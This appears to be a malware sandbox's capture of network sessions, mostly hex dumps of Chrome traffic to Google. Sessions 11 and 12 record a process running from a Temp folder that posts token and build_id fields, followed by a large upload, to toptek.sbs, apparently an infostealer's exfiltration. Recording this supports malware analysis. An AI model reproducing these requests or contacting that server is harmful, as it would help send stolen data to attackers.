                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:58 UTC982INData Raw: 33 63 66 0d 0a 36 54 56 64 4b 4e 57 73 77 63 6a 4e 50 52 58 6f 35 55 6c 68 6c 4d 57 73 30 52 47 70 70 64 31 42 58 62 47 64 55 65 58 6c 34 55 46 70 75 63 55 68 5a 63 47 38 35 59 6a 64 4f 55 32 46 61 59 30 34 33 56 7a 42 6d 4d 6d 4a 49 62 57 39 50 55 33 41 76 64 30 4a 71 4d 48 46 4d 5a 6a 4a 72 64 47 70 6c 55 31 4a 31 64 6b 52 4a 63 6d 63 30 4f 45 51 76 64 30 4a 77 55 48 4e 59 63 57 63 77 65 6c 63 30 4e 55 64 4a 52 55 56 32 63 33 42 55 4e 45 46 46 4e 30 67 31 53 45 49 35 54 54 45 32 55 6a 4a 6f 4d 47 56 51 56 6b 78 69 61 55 4d 72 4d 32 70 48 56 6e 64 6a 59 31 45 72 52 33 41 79 63 48 56 48 5a 6c 70 68 61 54 4e 5a 59 30 68 78 57 6d 6c 4c 55 30 63 32 5a 30 52 53 4d 30 46 53 64 6b 78 50 4e 45 35 52 5a 47 4a 31 63 6d 46 34 53 58 56 30 55 32 35 6f 4e 33 46 4a 4f
                                                                                                                                                                                                                                                                                                  Data Ascii: 3cf6TVdKNWswcjNPRXo5UlhlMWs0RGppd1BXbGdUeXl4UFpucUhZcG85YjdOU2FaY043VzBmMmJIbW9PU3Avd0JqMHFMZjJrdGplU1J1dkRJcmc0OEQvd0JwUHNYcWcwelc0NUdJRUV2c3BUNEFFN0g1SEI5TTE2UjJoMGVQVkxiaUMrM2pHVndjY1ErR3AycHVHZlphaTNZY0hxWmlLU0c2Z0RSM0FSdkxPNE5RZGJ1cmF4SXV0U25oN3FJO
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  9192.168.2.549793142.250.181.1324436152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:57 UTC518OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:58 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Version: 705503573
                                                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:23:58 GMT
                                                                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:58 UTC372INData Raw: 31 37 32 34 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                                                                  Data Ascii: 1724)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:58 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                                                                  Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:58 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                                                  Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:58 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                                                                  Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:58 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                                                                  Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:58 UTC260INData Raw: 66 65 0d 0a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 33 39 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20
                                                                                                                                                                                                                                                                                                  Data Ascii: fe"menu-content","metadata":{"bar_height":60,"experiment_id":[3700339,3701384,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){var
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:58 UTC1390INData Raw: 38 30 30 30 0d 0a 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 78 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 61 2e 6a 29 69 66 28 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 29 66 6f 72 28 76 61 72 20 64 20 6f 66 20 63 29 5f 2e 78 64 28 61 2c 62 2c 64 29 3b 65 6c 73 65 7b 64 5c 75 30 30 33 64 28 30 2c 5f 2e 7a 29 28 61 2e 43 2c 61 2c 62 29 3b 63 6f 6e 73 74 20 65 5c 75 30 30 33 64 61 2e 76 2b 63 3b 61 2e 76 2b 2b 3b 62 2e 64 61 74 61 73 65 74 2e 65 71 69 64 5c 75 30 30 33 64 65 3b 61 2e 42 5b 65 5d 5c 75 30 30 33 64 64 3b 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 63 2c 64
                                                                                                                                                                                                                                                                                                  Data Ascii: 8000dow\u003dthis;\ntry{\n_.xd\u003dfunction(a,b,c){if(!a.j)if(c instanceof Array)for(var d of c)_.xd(a,b,d);else{d\u003d(0,_.z)(a.C,a,b);const e\u003da.v+c;a.v++;b.dataset.eqid\u003de;a.B[e]\u003dd;b\u0026\u0026b.addEventListener?b.addEventListener(c,d
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:58 UTC1390INData Raw: 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 49 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 46 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 6e 68 5c 75 30 30 33 64 61 7d 7d 3b 5f 2e 4b 64 5c 75 30 30 33 64 5b 47 64 28 5c 22 64 61 74 61 5c 22 29 2c 47 64 28 5c 22 68 74 74 70 5c 22 29 2c 47 64 28 5c 22 68 74 74 70 73 5c 22 29 2c 47 64 28 5c 22 6d 61 69 6c 74 6f 5c 22 29 2c 47 64 28 5c 22 66 74 70 5c 22 29 2c 6e 65 77 20 5f 2e 46 64 28 61 5c 75 30 30 33 64 5c 75 30 30 33 65 2f 5e 5b 5e 3a 5d 2a 28 5b 2f 3f 23 5d
                                                                                                                                                                                                                                                                                                  Data Ascii: r(a){this.i\u003da}toString(){return this.i}};_.Jd\u003dnew _.Id(\"about:invalid#zClosurez\");_.Fd\u003dclass{constructor(a){this.nh\u003da}};_.Kd\u003d[Gd(\"data\"),Gd(\"http\"),Gd(\"https\"),Gd(\"mailto\"),Gd(\"ftp\"),new _.Fd(a\u003d\u003e/^[^:]*([/?#]
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:58 UTC1390INData Raw: 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 63 2c 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c 22 3a 62 2e 6e 6f 6e 63 65 7c 7c 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5c 22 6e 6f 6e 63 65 5c 22 29 7c 7c 5c 22 5c 22 7d 3b 5c 6e 5f 2e 24 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 5c 75 30 30 33 64 5f 2e 4d 61 28 61 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 61 72 72 61 79 5c 22
                                                                                                                                                                                                                                                                                                  Data Ascii: 3d(d\u003d(c\u003d\"document\"in b?b.document:b).querySelector)\u003d\u003dnull?void 0:d.call(c,`${a}[nonce]`);return b\u003d\u003dnull?\"\":b.nonce||b.getAttribute(\"nonce\")||\"\"};\n_.$d\u003dfunction(a){var b\u003d_.Ma(a);return b\u003d\u003d\"array\"
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:58 UTC1390INData Raw: 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 6f 72 5c 22 3f 61 2e 68 74 6d 6c 46 6f 72 5c 75 30 30 33 64 63 3a 6a 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 64 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 6a 65 5b 64 5d 2c 63 29 3a 5f 2e 65 65 28 64 2c 5c 22 61 72 69 61 2d 5c 22 29 7c 7c 5f 2e 65 65 28 64 2c 5c 22 64 61 74 61 2d 5c 22 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 64 2c 63 29 3a 61 5b 64 5d 5c 75 30 30 33 64 63 7d 29 7d 3b 6a 65 5c 75 30 30 33 64 7b 63 65 6c 6c 70 61 64 64 69 6e 67 3a 5c 22 63 65 6c 6c 50 61 64 64 69 6e 67 5c 22 2c 63 65 6c 6c 73 70 61 63 69 6e 67 3a 5c 22 63 65 6c 6c 53 70 61 63 69 6e 67 5c 22
                                                                                                                                                                                                                                                                                                  Data Ascii: d\u003d\"class\"?a.className\u003dc:d\u003d\u003d\"for\"?a.htmlFor\u003dc:je.hasOwnProperty(d)?a.setAttribute(je[d],c):_.ee(d,\"aria-\")||_.ee(d,\"data-\")?a.setAttribute(d,c):a[d]\u003dc})};je\u003d{cellpadding:\"cellPadding\",cellspacing:\"cellSpacing\"


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  10192.168.2.549792142.250.181.1324436152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:57 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:58 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Version: 705503573
                                                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:23:58 GMT
                                                                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:58 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  11192.168.2.54981694.130.188.574431576C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:02 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----LX4WBAS0ZU37QIM7Y5PZ
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 505
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:02 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 4c 58 34 57 42 41 53 30 5a 55 33 37 51 49 4d 37 59 35 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 4c 58 34 57 42 41 53 30 5a 55 33 37 51 49 4d 37 59 35 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4c 58 34 57 42 41 53 30 5a 55 33 37 51 49 4d 37 59 35 50 5a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------LX4WBAS0ZU37QIM7Y5PZContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------LX4WBAS0ZU37QIM7Y5PZContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------LX4WBAS0ZU37QIM7Y5PZCont
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:03 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:03 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:03 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  12192.168.2.54982094.130.188.574431576C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:03 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----IEUKNGLFCBIMYUSRQI5F
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 213453
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
